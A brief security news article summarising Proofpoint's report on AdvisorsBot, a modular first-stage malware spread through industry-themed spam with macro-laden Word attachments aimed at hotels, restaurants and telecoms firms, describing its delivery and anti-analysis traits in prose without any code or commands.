Security researchers at Proofpoint have detected a new malware threat that is being used in targeted attacks on hotels, restaurants, and telecoms firms. AdvisorsBot malware, so named because its C&C servers contain the word advisors, was first detected in May 2018 in a variety of spam email campaigns.
AdvisorsBot malware is under development although the current form of the malware has been used in multiple attacks around the globe, although the bulk of those attacks have been conducted in the United States. The spam campaigns are believed to be conducted by a threat actor known to Proofpoint researchers as TA555.
AdvisorsBot is not related to Marap malware, although it operates in a similar fashion in that the malware is a first-stage payload which is used to fingerprint the victim and identify whether the target is of interest and worthy of a more extensive compromise. Proofpoint notes that these malware variants are two examples of a growing trend of highly versatile modular malware that can be used in a variety of different attacks.
AdvisorsBot malware is written in C, although another form of the malware has been identified that have been written using PowerShell with a .NET DLL inside the PowerShell script. This form of the malware, which has been named PoshAdvisor, and runs in the memory without writing any data to the disk.
The researchers note that these malware variants have many anti-analysis features and can detect a variety of different malware analysis tools and can determine if they are running on a virtual machine. If on a VM or malware analysis tools are detected, the malware exits.
The spam emails used to deliver the malware contain a Word attachment with a macro that, if allowed to run, executes a PowerShell command that downloads a PowerShell script that executes embedded shellcode that runs AdvisorsBot.
Three different email lures have been detected, each of which targets a specific industry sector. While the campaign appears to be targeted, emails have been delivered to targets unrelated to the content of the emails which suggests a more random distribution of the emails.
Hotels are being targeted with a message that claims to have been sent by a person who has previously stayed at the hotel and has been charged twice for the stay. The email attachment appears to be a bank statement showing the double charge.
The emails targeting restaurants claim that the sender of the email visited the restaurant and suffered complicated, extreme food poisoning. The email attachment contains details of illness and the opinion of a physician, along with a threat of legal action.
The emails targeting telecoms firms claim to be a resume sent in a speculative application for employment.